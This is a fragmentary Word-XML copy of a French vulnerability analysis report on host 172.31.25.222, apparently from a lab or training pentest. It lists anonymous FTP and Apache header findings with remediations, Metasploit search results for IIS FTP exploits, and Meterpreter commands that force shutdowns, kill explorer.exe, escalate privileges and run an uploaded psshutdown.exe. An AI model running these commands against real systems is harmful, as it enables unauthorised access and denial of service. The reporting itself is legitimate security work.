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bookmarkStart w:colFirst="0" w:colLast="0" w:name="_vjxtpi2wyar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Rapport d'Analyse des Vulnérabilités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shd w:fill="a4c2f4" w:val="clear"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Informations Générales</w:t>
      </w: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 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Adresse du serveur scanné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172.31.25.222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Environnement d'analyse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Kali Linux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Outils utilisés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Nmap, Nessus, Metasploit, OpenVAS,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Gobuster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Nikto, Wpscan,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Searchsploit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sz w:val="34"/>
          <w:szCs w:val="34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shd w:fill="a4c2f4" w:val="clear"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Vulnérabilités Identifiées :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6"/>
          <w:szCs w:val="26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1. Vulnérabilité : Service FTP anonymement accessible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 CVSS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: 5.3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Détection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Nmap + Metasploit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Le service FTP ouvert permet un accès anonyme non restreint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Recommandation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Désactiver l'accès anonyme et utiliser SFTP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0  exploit/windows/ftp/ms09_053_ftpd_nlst     </w:t>
        <w:tab/>
        <w:t xml:space="preserve">2009-08-31   </w:t>
        <w:tab/>
        <w:t xml:space="preserve"> MS09-053 Microsoft IIS FTP Server NLST Response Overflow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  auxiliary/dos/windows/ftp/iis75_ftpd_iac_bof   2010-12-21   </w:t>
        <w:tab/>
        <w:tab/>
        <w:t xml:space="preserve">Microsoft IIS FTP Server Encoded Response Overflow Trigger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  auxiliary/dos/windows/ftp/iis_list_exhaustion  2009-09-03   </w:t>
        <w:tab/>
        <w:t xml:space="preserve">Microsoft IIS FTP Server LIST Stack Exhaustion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Vulnérabilité : Mauvaise configuration d'Apache HTTP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Score CVSS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6.5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Détection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Nikto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Headers de sécurité absents, facilitant les attaques XSS et Clickjacking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Recommandation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Ajouter des headers de sécurité dans la configuration du serveur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44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43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166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cmd.exe -a "/c shutdown /s /f /t 0"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cmd.exe -a "/c shutdown /r /f /t 0"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poweroff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getsystem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exit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cmd.exe -a "/c taskkill /f /im explorer.exe"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cmd.exe -a "/c shutdown /s /f /t 0 /d p:4:0 /c \"System is shutting down now.\""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upload /path/to/psshutdown.exe C:\\Windows\\Temp\\psshutdown.exe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meterpreter &gt; execute -f C:\\Windows\\Temp\\psshutdown.exe -a "/s /f /t 0"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556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exploit/windows/browser/communicrypt_mail_activex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